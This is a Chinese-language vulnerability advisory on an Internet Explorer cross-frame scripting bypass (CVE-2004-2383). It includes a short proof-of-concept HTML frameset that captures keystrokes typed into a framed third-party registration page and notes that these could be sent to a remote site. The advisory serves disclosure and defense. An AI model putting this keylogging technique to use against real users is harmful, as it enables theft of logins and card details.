首页 -> 安全研究

安全研究

安全漏洞
Microsoft Internet Explorer跨帧脚本限制绕过漏洞

发布日期:2004-02-27
更新日期:2004-03-02

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP Professional
    - Microsoft Windows XP Home
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows ME
    - Microsoft Windows 98 SE
    - Microsoft Windows 98
    - Microsoft Windows 2003 Web Edition
    - Microsoft Windows 2003 Standard Edition
    - Microsoft Windows 2003 Enterprise Edition 64-bit
    - Microsoft Windows 2003 Enterprise Edition
    - Microsoft Windows 2003 Datacenter Edition 64-bit
    - Microsoft Windows 2003 Datacenter Edition
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ  ID: 9761
CVE(CAN) ID: CVE-2004-2383

Microsoft Internet Explorer是一款流行的WEB浏览器。

Microsoft Internet Explorer存在一个访问验证错误,远程攻击者可以利用这个漏洞可绕过跨帧脚本限制,盲目的'受信'的执行恶意脚本。

问题是由于IE事件处理函数中的不充分限制。根据Microsoft Knowledge Base Article 167796( http://support.microsoft.com/support/kb/articles/Q167/7/96.asp ),在不同域中的帧访问必须限制。但是通过构建包含恶意JavaScript的帧定义,可绕过帧访问限制。

攻击者可以诱骗用户连接包含恶意帧的页面来利用这个漏洞。获得敏感信息,或者受信情况下访问伪造页面。

<*来源:iDEFENSE
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107789805523342&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

下面是通过利用frameset的iDEFENSE注册页,会显示击键记录:

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
    k = window.event.keyCode;
    window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.idefense.com/register.jsp" scrolling="auto">
</frameset>
</html>

下面的击键事件只在事件通过framesets时才发生,恶意脚本会监视所有目标Frameset中的击键记录,并传送记录到任意远程指定地点。因此利用这个漏洞可获得敏感信息,如登录信息和信用卡信息。

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:4052
严重程度:1(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障